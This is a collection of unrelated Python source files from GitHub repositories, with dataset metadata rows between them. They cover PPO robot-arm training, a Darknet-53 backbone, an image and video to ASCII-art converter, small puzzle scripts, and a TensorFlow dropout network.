env.set_task(task, backend="torch")
from stable_baselines3 import PPO
from stable_baselines3.common.callbacks import BaseCallback
from os.path import exists
import signal
import sys
timesteps = 1000000
path = "ppo_franka"
# log success rate to tensor board
# log success rate to tensor board
class TensorBoardCallback(BaseCallback):
    """SB3 callback that logs the task's rolling success rate each step."""
    def __init__(self) -> None:
        super(TensorBoardCallback, self).__init__()
    def _on_step(self) -> bool:
        # only start logging success rate after a few attempts have been made
        if task.target_reached_count + task.failure_count < 20:
            return True
        # Halve both counters once their sum gets too high, so the logged
        # rate reflects recent attempts rather than the whole run.
        if task.target_reached_count + task.failure_count >= 200:
            task.target_reached_count = task.target_reached_count / 2
            task.failure_count = task.failure_count / 2
        # Counts are tensors here, hence the .item() -- TODO confirm.
        self.logger.record('Success rate', (task.target_reached_count / (task.target_reached_count + task.failure_count)).item())
        return True
# try loading old model. OnFail: create new one
if exists(path+".zip"):
    model = PPO.load(path)
    model.set_env(env)
    model.set_parameters(path)
    print("Loaded old model!", model)
else:
    # create agent from stable baselines
    model = PPO(
        "MlpPolicy",
        env,
        n_steps=1024,
        batch_size=1024,
        n_epochs=20,
        learning_rate=0.001,
        gamma=0.99,
        device="cuda:0",
        ent_coef=0.0,
        vf_coef=0.5,
        max_grad_norm=1.0,
        verbose=1,
        tensorboard_log="./franka_tensorboard"
    )
    print("Created new model!")
# save and close model on interrupt
def signal_handler(sig, frame):
    """Ctrl-C handler: persist the model and shut the sim down cleanly."""
    model.save(path)
    env.close()
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# Train in 10 chunks so the run can be interrupted/resumed between them.
# NOTE(review): timesteps/10 is a float; SB3 appears to accept it -- confirm.
for _ in range(10):
    model.learn(total_timesteps=timesteps/10, callback=TensorBoardCallback(), reset_num_timesteps=False)
# save model, close simulation
model.save(path)
env.close()
26951848240 | import dis
def main():
    # Read one integer from stdin.
    a=int(input())
    # Even input: print 0, 2, ..., a-2 (range's upper bound is exclusive).
    if a%2==0:
        for i in range(0,a,2):
            print(i)
    # Odd input: print 1, 3, ..., a inclusive.
    # (Kept as a while-loop on purpose: the module disassembles this
    # function with dis.dis, so the bytecode shape is part of the demo.)
    else:
        i=1
        while i<=a:
            print(i)
            i+=2
#main()
dis.dis(main)
| jero98772/toma_nota | clases/lenguajes_programacion/jcoco/b.py | b.py | py | 158 | python | en | code | 0 | github-code | 50 |
32871865820 | import torch.nn as nn
class Convolution(nn.Module):
    """Conv2d -> BatchNorm2d -> LeakyReLU(0.1) block used throughout Darknet-53.

    Args:
        c_in:  input channel count.
        c_out: output channel count.
        k, s, p: kernel size, stride, padding.
        bias:  whether the convolution carries a bias term (normally False,
               since the following BatchNorm supplies the affine shift).
    """
    def __init__(self, c_in, c_out, k, s, p, bias=False):
        super(Convolution, self).__init__()
        self.conv = nn.Sequential(
            # BUG FIX: `bias` must be passed by keyword. Passed positionally
            # it lands in Conv2d's `dilation` parameter (signature order is
            # in, out, kernel, stride, padding, dilation, groups, bias),
            # making dilation=False (i.e. 0) while leaving bias enabled.
            nn.Conv2d(c_in, c_out, k, s, p, bias=bias),
            nn.BatchNorm2d(c_out),
            nn.LeakyReLU(0.1)
        )

    def forward(self, x):
        """Apply convolution, batch norm, then leaky ReLU."""
        return self.conv(x)
class ConvResidual(nn.Module):
    """Darknet residual unit: 1x1 bottleneck down to c_in // 2, then a 3x3
    conv back up to c_in, added to the input via an identity skip."""

    def __init__(self, c_in):
        super(ConvResidual, self).__init__()
        bottleneck = c_in // 2
        self.conv = nn.Sequential(
            Convolution(c_in, bottleneck, 1, 1, 0),
            Convolution(bottleneck, c_in, 3, 1, 1),
        )

    def forward(self, x):
        """Return x + F(x); spatial size and channel count are unchanged."""
        residual = self.conv(x)
        return x + residual
class Darknet53(nn.Module):
    """Darknet-53 backbone. forward() returns three feature maps, deepest
    first, at 1/32, 1/16 and 1/8 of the input resolution (five stride-2
    convolutions in total), as used by YOLOv3-style detection heads."""
    def __init__(self):
        super(Darknet53, self).__init__()
        # Stem: 3 -> 32 channels, full resolution.
        self.conv1 = Convolution(3,32,3,1,1)
        # Each strided Convolution below halves the spatial resolution.
        self.conv2 = Convolution(32,64,3,2,1)
        self.conv3_4 = ConvResidual(64)
        self.conv5 = Convolution(64,128,3,2,1)
        # 2 residual units at 128 channels.
        self.conv6_9 = nn.Sequential(
            ConvResidual(128),
            ConvResidual(128)
        )
        self.conv10 = Convolution(128,256,3,2,1)
        # 8 residual units at 256 channels (1/8 resolution output).
        self.conv11_26 = nn.Sequential(
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256),
            ConvResidual(256)
        )
        self.conv27 = Convolution(256,512,3,2,1)
        # 8 residual units at 512 channels (1/16 resolution output).
        self.conv28_43 = nn.Sequential(
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512),
            ConvResidual(512)
        )
        self.conv44 = Convolution(512,1024,3,2,1)
        # 4 residual units at 1024 channels (1/32 resolution output).
        self.conv45_52 = nn.Sequential(
            ConvResidual(1024),
            ConvResidual(1024),
            ConvResidual(1024),
            ConvResidual(1024)
        )
    def forward(self,x):
        """Run the backbone; return (deep, mid, shallow) feature maps."""
        conv1 = self.conv1(x)
        conv2 = self.conv2(conv1)
        conv3_4 = self.conv3_4(conv2)
        conv5 = self.conv5(conv3_4)
        conv6_9 = self.conv6_9(conv5)
        conv10 = self.conv10(conv6_9)
        conv11_26 = self.conv11_26(conv10)
        conv27 = self.conv27(conv11_26)
        conv28_43 = self.conv28_43(conv27)
        conv44 = self.conv44(conv28_43)
        conv45_52 = self.conv45_52(conv44)
        return conv45_52, conv28_43, conv11_26
| wuxianjun666/darknet | model.py | model.py | py | 2,474 | python | en | code | 0 | github-code | 50 |
32619444210 | import cv2
import numpy
import uuid
from PIL import Image, ImageDraw, ImageFont, ImageColor
from src.utils import timer_func, convert_to_gray, IMAGE_EXTENSIONS, get_full_filename, get_rendered_filename, \
RENDERED_IMAGE_EXTENSION
pyxelart_defaults = {
'width': 128,
'height': 72,
'method': 'pyxelate',
'font_size': 20,
'asciiFont': 'Decoder',
'textColor': '#18F212',
'asciiBackground': '#000000',
'frame_step': 4,
'asciiCharSet': 'complex',
}
ASCII_TABLE_SIMPLE = " .:-=+*#%@"
ASCII_TABLE_DETAILED = " .'`^\",:;Il!i><~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$"
BASE_ENCODING_TIME = 1.8
@timer_func
def get_file_details(filename):
    """Return basic metadata for an image or video file.

    Images: width/height with frameRate and frames fixed at 1.
    Videos: fps, dimensions, frame count, five evenly spaced thumbnail
    files written next to the source, plus a rough encoding-time estimate.
    """
    filename = get_full_filename(filename)
    if filename.rsplit('.', 1)[1].lower() in IMAGE_EXTENSIONS:
        image = Image.open(filename)
        file_details = {'frameRate': 1,
                        'width': image.width,
                        'height': image.height,
                        'frames': 1
                        }
    else:
        video = cv2.VideoCapture(filename)
        # Named CAP_PROP constants instead of the magic numbers 7/5/3/4.
        frames = video.get(cv2.CAP_PROP_FRAME_COUNT)
        file_details = {'frameRate': int(video.get(cv2.CAP_PROP_FPS)),
                        'width': int(video.get(cv2.CAP_PROP_FRAME_WIDTH)),
                        'height': int(video.get(cv2.CAP_PROP_FRAME_HEIGHT)),
                        'frames': int(frames),
                        }
        thumbnails = []
        read_counter = 0
        basename = str(uuid.uuid1())  # unique stem so thumbnails never collide
        # BUG FIX: hoist the sampling step out of the loop and clamp it to
        # >= 1; int((frames - 1) / 4) is 0 for clips of <= 4 frames, which
        # made the modulo below raise ZeroDivisionError.
        step = max(int((frames - 1) / 4), 1)
        while video.isOpened():
            ret, cv2_im = video.read()
            if not ret:
                break
            if read_counter % step == 0:
                converted = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
                tn_image = Image.fromarray(converted)
                # BUG FIX: use the generated unique stem -- the uuid above
                # was computed but never used, so every video overwrote the
                # same fixed thumbnail names.
                tn_filename = f'{basename}-{read_counter}.{RENDERED_IMAGE_EXTENSION}'
                tn_full_filename = get_full_filename(tn_filename)
                tn_image.save(fp=tn_full_filename)
                thumbnails.append(tn_filename)
            read_counter += 1
        video.release()
        file_details['thumbnails'] = thumbnails
    file_details.update({
        'timePerFrame': BASE_ENCODING_TIME,
        'initialEncodingEst': BASE_ENCODING_TIME * file_details['frames'] / 60
    })
    return file_details
class PyxelArt:
    '''
    Generate new neural network, taking hidden layer sizes as a list, and
    dropout rate as p_keep
    '''
    def __init__(self, width=128, height=72, method='pyxelate', show_original=False, file_name='', font_name='Decoder',
                 text_color='#18F212', bg_color='#000000', frame_step=4, show_final=True, ascii_char_set='complex'):
        self.width = int(width)
        self.height = int(height)
        self.method = method  # 'pyxelate' | 'greyscale' | 'ascii'
        self.show_original = show_original
        self.show_final = show_final
        self.file_name = file_name
        self.new_file_name = get_rendered_filename(self.file_name, self.method)
        self.ascii_table = ASCII_TABLE_DETAILED if ascii_char_set == 'complex' else ASCII_TABLE_SIMPLE
        # Width of each grey bucket: one ASCII char per bucket of 0-255.
        self.ascii_chunks = 256 / len(self.ascii_table)
        self.font_size = 20  # ToDo: change based on chunk size
        self.ascii_font = ImageFont.truetype(f'fonts/{font_name}.ttf', self.font_size)
        self.text_color = ImageColor.getcolor(text_color, "RGB")
        self.ascii_background = ImageColor.getcolor(bg_color, "RGB")
        self.frame_step = frame_step  # process every Nth video frame
        # Per-frame working state, (re)assigned in open_image/convert_video.
        self.image = None
        self.pixels = None
        self.draw = None
        self.new_image = None
        self.new_draw = None
    # @timer_func
    def chunk_image(self, console_ascii=False):
        """Average self.image over a width x height grid of chunks, then
        pixelate/grey/ASCII-render each chunk according to self.method."""
        x_ratio = self.image.width / self.width
        y_ratio = self.image.height / self.height
        for y in range(0, self.height):
            for x in range(0, self.width):
                # Average the RGB values of every source pixel in the chunk.
                pixel_count = 0
                pixel_sum = (0, 0, 0)
                for y_sub in range(int(y * y_ratio), int((y + 1) * y_ratio)):
                    for x_sub in range(int(x * x_ratio), int((x + 1) * x_ratio)):
                        pt = self.pixels[x_sub, y_sub]
                        pixel_sum = (pixel_sum[0] + pt[0], pixel_sum[1] + pt[1], pixel_sum[2] + pt[2])
                        pixel_count += 1
                # Pyxelate default
                pixel_avg = (
                    int(pixel_sum[0] / pixel_count), int(pixel_sum[1] / pixel_count),
                    int(pixel_sum[2] / pixel_count))
                if self.method in ('greyscale', 'ascii'):
                    grey = convert_to_gray(pixel_avg)
                    if self.method == 'greyscale':
                        pixel_avg = (grey, grey, grey)
                    if self.method == 'ascii':
                        # Map the grey level to a character and draw it onto
                        # the blank new_image at the chunk's position.
                        grey_char = self.ascii_table[int(grey / self.ascii_chunks)]
                        if console_ascii:
                            print(grey_char, end='')
                        self.new_draw.text((int(x * x_ratio), int(y * y_ratio)), grey_char, fill=self.text_color,
                                           font=self.ascii_font)
                # Update the image for pyxelate and greyscale
                if self.method != 'ascii':
                    for x_sub in range(int(x * x_ratio), int((x + 1) * x_ratio)):
                        for y_sub in range(int(y * y_ratio), int((y + 1) * y_ratio)):
                            self.pixels[x_sub, y_sub] = pixel_avg
            if console_ascii:
                print('')
        if self.method == 'ascii':
            self.image = self.new_image
    def open_image(self):
        """Load self.file_name and set up the working image/pixel buffers."""
        try:
            self.image = Image.open(get_full_filename(self.file_name))
            self.pixels = self.image.load()
            self.draw = ImageDraw.Draw(self.image)
            # Blank canvas for ASCII rendering, same size as the source.
            self.new_image = Image.new(mode="RGB", size=(self.image.width, self.image.height),
                                       color=self.ascii_background)
            self.new_draw = ImageDraw.Draw(self.new_image)
        except Exception as e:
            print('Unable to open image file', e)
    def convert_image(self):
        """Convert a single still image and save it under new_file_name."""
        self.open_image()
        if self.image:
            if self.show_original:
                self.image.show()
            self.chunk_image()
            self.image.save(fp=get_full_filename(self.new_file_name))
            if self.show_final:
                self.image.show()
    # @timer_func
    def convert_video(self):
        """Convert every frame_step-th frame of the video and write them out
        as a new video at the source's frame rate."""
        image_counter = 0
        read_counter = 0
        print('Read file: {}'.format(self.file_name))
        video_in = cv2.VideoCapture(get_full_filename(self.file_name))  # ToDo: says we capture an image from a webcam
        frame_rate = int(video_in.get(5))  # 5 == CAP_PROP_FPS
        # Below works for AVI
        # video_out = cv2.VideoWriter(get_full_filename(self.new_file_name), cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),
        #                             frame_rate, (int(video_in.get(3)), int(video_in.get(4))))
        # Below works for mp4 on desktop, but not in browser to play
        video_out = cv2.VideoWriter(get_full_filename(self.new_file_name), cv2.VideoWriter_fourcc(*'mp4v'), frame_rate,
                                    (int(video_in.get(3)), int(video_in.get(4))))
        print(f'Processing frame {read_counter:5d}', end='')
        while video_in.isOpened():
            ret, cv2_im = video_in.read()
            if ret and read_counter % self.frame_step == 0:
                # \b backspaces overwrite the previous frame counter in place.
                print(f'\b\b\b\b\b{read_counter:5d}', end='')
                converted = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
                self.image = Image.fromarray(converted)
                # ToDo: the 3 class image variables need to be set more generically in chunk process
                self.pixels = self.image.load()
                if self.method == 'ascii':
                    self.new_image = Image.new(mode="RGB", size=(self.image.width, self.image.height),
                                               color=self.ascii_background)
                    self.new_draw = ImageDraw.Draw(self.new_image)
                self.chunk_image()
                # PIL (RGB) back to OpenCV's BGR channel order for writing.
                pil_image = self.image.convert('RGB')
                open_cv_image = numpy.array(pil_image)
                open_cv_image = open_cv_image[:, :, ::-1].copy()
                video_out.write(open_cv_image)
                image_counter += 1
            elif not ret:
                break
            read_counter += 1
        video_in.release()
        video_out.release()
        print(f'\nsource frames={read_counter}, pyxelated frames={image_counter}')
    def convert_file(self):
        """Dispatch to image or video conversion based on the file extension."""
        if self.file_name.rsplit('.', 1)[1].lower() in IMAGE_EXTENSIONS:
            self.convert_image()
        else:
            self.convert_video()
if __name__ == '__main__':
# P = PyxelArt(file_name='static/tmp/test1.png', method="ascii") # Convert static image to ascii art
P = PyxelArt(file_name='static/tmp/test2.mp4', method="ascii") # Convert video file to ascii art
P.convert_file()
| PittCaleb/pyxelArt | src/pyxelart.py | pyxelart.py | py | 8,903 | python | en | code | 0 | github-code | 50 |
71786615194 | n = int(input())
# Find the smallest positive weight that cannot be measured with the given
# weights: scan the sorted weights, growing the reachable prefix sum.
p = list(map(int, input().split()))
p.sort()
weigh = p[0]
# If even the smallest weight exceeds 1, then 1 itself is unmeasurable.
if weigh > 1:
    print(1)
else:
    for i in range(1, n):
        # When picking the i-th weight, it must not exceed the current
        # reachable sum by more than 1; if weigh is 20 and the next weight
        # is 21, it can still extend the reachable range, but anything
        # larger leaves weigh + 1 unmeasurable.
        if weigh + 1 < p[i]:
            print(weigh + 1)
            exit(0)
        weigh += p[i]
    print(weigh + 1)
28826721749 | # 开发作者:crowder Zhuo
# 开发时间:2019/10/10 20:44
# 文件名称: try022
# 开发工具:Python
tour = []
height = []
hei = 100.0 # 起始高度
tim = 10 # 次数
for i in range(1, tim + 1):
# 从第二次开始,落地时的距离应该是反弹高度乘以2(弹到最高点再落下)
if i == 1:
tour.append(hei)
else:
tour.append(2 * hei)
hei /= 2
height.append(hei)
print('总高度:',sum(tour))
print('第10次反弹高度:',height[-1]) | shuai2931806756/test001 | try022.py | try022.py | py | 527 | python | zh | code | 0 | github-code | 50 |
23903709790 | #Treasures island game
print("Welcome to Treasure Island.")
print("Your mission is to find the treasure.")
#Different paths to choose
choice = input("You're at a lake house in the forest, do you go right or left?\n")
if choice == "left":
choice2 = input("You've made it to the docks, do you want to 'wait' or 'swim' across?\n").lower()
if choice2 == "wait":
choice3 = input("You've made it to the island, theres three doors a red one, blue one, and a yellow one? which one do you choose?\n").lower()
if choice3 == "red":
print ("You walked into the dragons den, Game Over")
elif choice3 == "blue":
print("You fell into a well and drowned, Game Over")
elif choice3 == "yellow":
print ("you've made it to ther safe house, !!!!YOU WON!!!!")
else:
print("That door doesn't exist, Game Over")
else:
print("The monster of the lake pulled you down, Game Over")
else:
print("The forest creatures captured you and ate you, Game Over")
#simple love game
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is their name? \n")
# Covnert the names to all lower case
name1 = name1.lower()
name2 = name2.lower()
#adding the names together
combined_names = name1 + name2
# Score is built from how often the letters of "true" and "love" occur
# in the combined names: tens digit from "true", ones digit from "love".
t = combined_names.count('t')
r = combined_names.count('r')
u = combined_names.count('u')
e = combined_names.count('e')
true = t + r + u + e
l = combined_names.count('l')
o = combined_names.count('o')
v = combined_names.count('v')
e = combined_names.count('e')
love = l + o + v + e
# Digit concatenation, not addition: e.g. true=4, love=7 -> 47.
final_score = int(str(true) + str(love))
# Code that is going to make the game run
if (final_score < 10) or (final_score > 90):
    print(f"Your score is {final_score}, you go together like coke and mentos")
elif (final_score >= 40) and final_score <= 50:
    print(f"Your score is {final_score}, you are alright together.")
else:
    print(f"Your score is {final_score}.")
| XavierTackett/Self_python_projects | simple_games.py | simple_games.py | py | 1,953 | python | en | code | 0 | github-code | 50 |
74381971036 | """
Quicksort: Time Complexity
Best/Average: O(n log(n))
Worst: O(n^2)
Space Complexity:
O(n) for this slicing-based version (an in-place variant would be O(log(n)))
Example: 4, 2, 7, 3, 1, 6
pivot = 4 (first element)
"""
def quickSort(arr):
    """Return a new sorted list using quicksort (Lomuto partition on arr[0]).

    BUG FIX: the input list is no longer touched -- the original swapped
    elements of the caller's list in place while also returning a fresh
    sorted list, and returned the original object (not a copy) for inputs
    of length < 2.
    """
    elements = len(arr)  # get number of elements
    # Base case: 0/1 elements are already sorted; copy so callers always
    # own the returned list.
    if elements < 2:
        return arr[:]
    arr = arr[:]  # work on a copy; never mutate the caller's list
    pivot = 0  # Final position of the partitioning element arr[0]
    for i in range(1, elements):  # Partitioning loop
        if arr[i] <= arr[0]:  # element belongs left of the pivot
            pivot += 1
            arr[i], arr[pivot] = arr[pivot], arr[i]
    arr[0], arr[pivot] = arr[pivot], arr[0]  # Move pivot into place
    left = quickSort(arr[0:pivot])  # Sort the elements left of the pivot
    right = quickSort(arr[pivot + 1:elements])  # Sort the elements right of the pivot
    return left + [arr[pivot]] + right  # Merge everything together
array_to_be_sorted = [4, 2, 7, 3, 1, 6]
print("Original Array: ", array_to_be_sorted)
print("Sorted Array: ", quickSort(array_to_be_sorted))
# output:
# Original Array: [4, 2, 7, 3, 1, 6]
# Sorted Array: [1, 2, 3, 4, 6, 7]
| lauras5/python_algs | sorting/quicksort.py | quicksort.py | py | 1,394 | python | en | code | 0 | github-code | 50 |
22117380357 | import math
STEPSIZE = 0.1 # mm/step
MAX_RPM = 500 # max motor speed
TRAVEL_SPEED = 40 # mm/sec
STEPS_PER_REV = 200
x_steps = []
y_steps = []
x_rpms = []
y_rpms = []
x = 0
y = 0
def distance_between_coords(x1, y1, x2, y2):
    """Euclidean distance between (x1, y1) and (x2, y2) in mm."""
    dx = x2 - x1
    dy = y2 - y1
    return math.sqrt(dx * dx + dy * dy)
# returns number of motor steps needed to go `dist` mm
def motor_steps_from_distance(dist):
    """Convert a distance in mm to whole motor steps: floor(dist / STEPSIZE).

    NOTE(review): floating-point quotients such as 0.3 / 0.1 can land just
    below the true value, so floor() occasionally drops a step -- confirm
    whether rounding was intended.
    """
    return math.floor(dist / STEPSIZE)
def calculate_travel_time(dist):
    """Seconds needed to travel `dist` mm at the constant TRAVEL_SPEED."""
    return dist / TRAVEL_SPEED
def calculate_rpm(steps, travel_time):
    """Motor speed in RPM needed to cover `steps` in `travel_time` seconds.

    Returns 0 when either argument is zero (idle axis or no travel).
    """
    if steps == 0 or travel_time == 0:
        return 0
    revolutions = steps / STEPS_PER_REV
    minutes = travel_time / 60
    return revolutions / minutes
# Read "x, y" coordinate pairs (one per line) and derive, per move, the
# signed step counts and the RPM for each axis so both finish together.
with open('swirls/flower_spiral_1.gcode') as f:
    for i, next_coord in enumerate(f):
        next_x, next_y = tuple([int(val.strip()) for val in next_coord.split(",")])
        x_dist = next_x - x
        y_dist = next_y - y
        # Travel time comes from the straight-line distance at TRAVEL_SPEED.
        total_distance = distance_between_coords(x, y, next_x, next_y)
        travel_time = calculate_travel_time(total_distance)
        # print(travel_time)
        x_steps.append(motor_steps_from_distance(x_dist))
        y_steps.append(motor_steps_from_distance(y_dist))
        x_rpms.append(round(calculate_rpm(x_steps[i], travel_time)))
        y_rpms.append(round(calculate_rpm(y_steps[i], travel_time)))
        x, y = next_x, next_y
# Pair up the per-axis lists into [[x_steps, y_steps], ...] shaped data.
steps = list(map(list, zip(x_steps, y_steps)))
rpms = list(map(list, zip(x_rpms, y_rpms)))
# NOTE(review): `out` is computed but never used beyond the commented-out
# debug prints below.
out = list(map(list, zip(steps, rpms)))
# print(len(rpms))
# for o in out:
#     print(o)
# Emit a simple back-and-forth test pattern (50 cycles of +/-200 steps on X).
a = []
for i in range(50):
    a.append([200,0])
    a.append([-200,0])
print(a)
| 3chospirits/Zen-Sand-Table--ES50-Final-Project | archive/coord_to_motor.py | coord_to_motor.py | py | 1,470 | python | en | code | 0 | github-code | 50 |
34656680824 | _author_ = 'jake'
_project_ = 'leetcode'
# https://leetcode.com/problems/maximum-depth-of-n-ary-tree/
# Given a n-ary tree, find its maximum depth.
# The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
# Recursive function. Base cases of no node or leaf node. Else add 1 to the max depth of any child.
# Time - O(n)
# Space - O(n)
class Solution(object):
    def maxDepth(self, root):
        """
        :type root: Node
        :rtype: int
        """
        # An empty tree has depth zero.
        if not root:
            return 0
        # max() over an empty sequence would raise, so a leaf (no children)
        # is handled via the default argument rather than a separate branch.
        child_depths = (self.maxDepth(child) for child in root.children or [])
        return 1 + max(child_depths, default=0)
19528465138 | import unittest
from lxml import objectify
from color_gamma_analyzer.brightness_processing import brightness_processing
class TestBrightnessProcessingMethod(unittest.TestCase):
    """Unit tests for brightness_processing against small XML fixtures."""

    def test_brightness_processing(self):
        """Two brightness bins over one image: check bin ranges and members."""
        brightness_processing(2, "./resources/data_files/input_bp_test.xml",
                              "./resources/data_files/output_bp_test.xml")
        # `with` guarantees the handle is closed even if read() fails.
        with open("./resources/data_files/output_bp_test.xml") as file:
            string_data = file.read()
        root = objectify.fromstring(string_data)
        self.assertEqual(int(root.attrib['all_images']), 1)
        # MODERNIZATION: Element.getchildren() is deprecated and removed in
        # recent lxml/ElementTree; iterchildren() is the supported way to
        # walk direct children of an objectify element.
        bins = list(root.iterchildren())
        self.assertEqual(float(bins[0].attrib['start']), 0)
        self.assertEqual(float(bins[0].attrib['end']), 0.5)
        self.assertEqual(int(list(bins[0].iterchildren())[0].text), 0)
        self.assertEqual(float(bins[1].attrib['start']), 0.5)
        self.assertEqual(float(bins[1].attrib['end']), 1)
        self.assertEqual(int(list(bins[1].iterchildren())[0].text), 1)

    def test_exception_from_brightness_processing(self):
        """Non-positive bin counts must raise ValueError."""
        brightness_processing(2, "./resources/data_files/input_bp_test.xml",
                              "./resources/data_files/output_bp_test.xml")
        self.assertRaises(ValueError, brightness_processing, -1,
                          "./resources/data_files/input_bp_test.xml",
                          "./resources/data_files/output_bp_test.xml")
        self.assertRaises(ValueError, brightness_processing, 0,
                          "./resources/data_files/input_bp_test.xml",
                          "./resources/data_files/output_bp_test.xml")
if __name__ == '__main__':
unittest.main()
| yzghurovskyi/ColorGammaAnalyzer | color_gamma_analyzer/tests/test_brightness_processing.py | test_brightness_processing.py | py | 1,724 | python | en | code | 2 | github-code | 50 |
32797968749 | import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from LP_util import get_normalized_data
from sklearn.utils import shuffle
'''
Notes added by myself as learning exercise and practice. Code by the
Lazy Programmer for Deep Learning Part 2 (Modern Deep Learning in Python).
'''
class HiddenLayer(object):
    '''
    Generate new hidden layer with input size and number of nodes as args.
    '''
    def __init__(self, M1, M2):
        self.M1 = M1
        self.M2 = M2
        # He-style initialization: scale by sqrt(2 / fan_in), suited to ReLU.
        W = np.random.randn(M1, M2) * np.sqrt(2.0 / M1)
        b = np.zeros(M2)
        self.W = tf.Variable(W.astype(np.float32))
        self.b = tf.Variable(b.astype(np.float32))
        self.params = [self.W, self.b]  # collected by ANN for bookkeeping
    def forward(self, X):
        '''Calculate values for next layer with ReLU activation'''
        return tf.nn.relu(tf.matmul(X, self.W) + self.b)
class ANN(object):
    '''
    Generate new neural network, taking hidden layer sizes as a list, and
    dropout rate as p_keep.

    Uses the TF1 graph API (tf.placeholder / tf.Session), which requires
    TF1 or tf.compat.v1 -- it will not run on plain TF2.
    '''
    def __init__(self, hidden_layer_sizes, p_keep):
        self.hidden_layer_sizes = hidden_layer_sizes
        self.dropout_rates = p_keep
    def fit(self, X, Y, Xvalid, Yvalid, lr=1e-4, mu=0.9, decay=0.9, epochs=15,
            batch_sz=100, print_every=50):
        '''
        Takes training data and test data (valid) at once, then trains and
        validates along the way. Modifying hyperparams of learning_rate, mu,
        decay, epochs (iterations = N//batch_sz * epochs), batch_sz and how
        often to validate and print results are passed as optional variables.
        '''
        X = X.astype(np.float32)
        Y = Y.astype(np.int64)
        Xvalid = Xvalid.astype(np.float32)
        Yvalid = Yvalid.astype(np.int64)
        # initialize hidden layers
        N, D = X.shape
        K = len(set(Y))  # number of classes inferred from the labels
        self.hidden_layers = []
        M1 = D # first input layer is the number of features in X
        for M2 in self.hidden_layer_sizes:
            h = HiddenLayer(M1, M2)
            self.hidden_layers.append(h)
            M1 = M2 # input layer to next layer is this layer.
        # output layer weights (last hidden layer to K output classes)
        W = np.random.randn(M1, K) * np.sqrt(2.0 / M1)
        b = np.zeros(K)
        self.W = tf.Variable(W.astype(np.float32))
        self.b = tf.Variable(b.astype(np.float32))
        # collect params for later use, output weights are first here.
        self.params = [self.W, self.b]
        for h in self.hidden_layers:
            self.params += h.params
        # set up theano functions and variables
        inputs = tf.placeholder(tf.float32, shape=(None, D), name='inputs')
        labels = tf.placeholder(tf.int64, shape=(None,), name='labels')
        logits = self.forward(inputs) # logits then fed in to the cost func
        # softmax done within the cost function, not at the end of forward
        cost = tf.reduce_mean(
            tf.nn.sparse_softmax_cross_entropy_with_logits(
                logits=logits,
                labels=labels
            )
        )
        '''
        Unlike theano, the train_op function is not fed all of the
        variable-function pairs for updating each of the weights (and caches,
        momentum terms etc). Simply use a training function with the objective
        specified (e.g. .minimize(cost)). The feed_dict that will be provided
        to train_op are the inputs to cost (X:inputs and Y:lables))
        '''
        train_op = tf.train.RMSPropOptimizer(lr, decay=decay,
                                             momentum=mu).minimize(cost)
        # train_op = tf.train.MomentumOptimizer(lr, momentum=mu).minimize(cost)
        # train_op = tf.train.AdamOptimizer(lr).minimize(cost)
        '''
        Setting up the last tensor equation placeholders to build the graphs
        that will be used for computation. No values, training loop is next!
        '''
        prediction = self.predict(inputs) # returns labels
        # validation cost will be calculated separately,
        # since nothing will be dropped
        test_logits = self.forward_test(inputs)
        test_cost = tf.reduce_mean(
            tf.nn.sparse_softmax_cross_entropy_with_logits(
                logits=test_logits,
                labels=labels
            )
        )
        # create a session and initialize the variables within it
        init = tf.global_variables_initializer()
        sess = tf.Session()
        sess.run(init)
        n_batches = N // batch_sz
        costs = []
        for i in range(epochs):
            print("epoch:", i, "n_batches:", n_batches)
            # Reshuffle each epoch so batches differ between epochs.
            X, Y = shuffle(X, Y)
            for j in range(n_batches):
                Xbatch = X[j*batch_sz:(j*batch_sz+batch_sz)]
                Ybatch = Y[j*batch_sz:(j*batch_sz+batch_sz)]
                sess.run(train_op, feed_dict={inputs: Xbatch,
                                              labels: Ybatch})
                if j % print_every == 0:
                    c = sess.run(test_cost, feed_dict={inputs: Xvalid,
                                                       labels: Yvalid})
                    p = sess.run(prediction, feed_dict={inputs: Xvalid})
                    costs.append(c)
                    e = error_rate(Yvalid, p)
                    print("i:", i, "j:", j, "nb:", n_batches, "cost:", c,
                          "error rate:", e)
        plt.plot(costs)
        plt.show()
    def forward(self, X):
        # tf.nn.dropout scales inputs by 1/p_keep
        # therefore, during test time, we don't have to scale anything
        Z = X
        '''
        Here is the dropout implementation. Tensorflow does the masking for us.
        Inputs (X) dropout is done first, outside the loop. Then dropout is
        performed on the outputs, before they become inputs to the next layer.
        This is a bit different from the theano code. Haven't thought about
        why he did this hard enough yet. I believe the outcome is the same, but
        the theano implementation is cleaner since it is all within the loop.
        '''
        Z = tf.nn.dropout(Z, self.dropout_rates[0])
        for h, p in zip(self.hidden_layers, self.dropout_rates[1:]):
            Z = h.forward(Z)
            Z = tf.nn.dropout(Z, p)
        return tf.matmul(Z, self.W) + self.b # logits of final layer.
    def forward_test(self, X):
        '''
        Note that inputs aren't scaled here, the dropout function already
        took care of that during training (see LP's note above).
        '''
        Z = X
        for h in self.hidden_layers:
            Z = h.forward(Z)
        return tf.matmul(Z, self.W) + self.b
    def predict(self, X):
        '''Return the argmax class label for each row of X (no dropout).'''
        pY = self.forward_test(X)
        return tf.argmax(pY, 1)
def error_rate(p, t):
    """Fraction of predictions `p` that disagree with targets `t` (elementwise for arrays)."""
    mismatched = p != t
    return np.mean(mismatched)
def relu(a):
    """Rectified linear unit: zero out the negative entries of `a` (works on scalars and arrays)."""
    positive = a > 0
    return a * positive
def main():
    """Entry point: fetch the normalized data and train a two-hidden-layer
    ANN with dropout keep-probabilities [0.8, 0.5, 0.5].
    """
    # step 1: get the data and define all the usual variables
    train_X, test_X, train_Y, test_Y = get_normalized_data()
    model = ANN([500, 300], [0.8, 0.5, 0.5])
    model.fit(train_X, train_Y, test_X, test_Y)


if __name__ == '__main__':
    main()
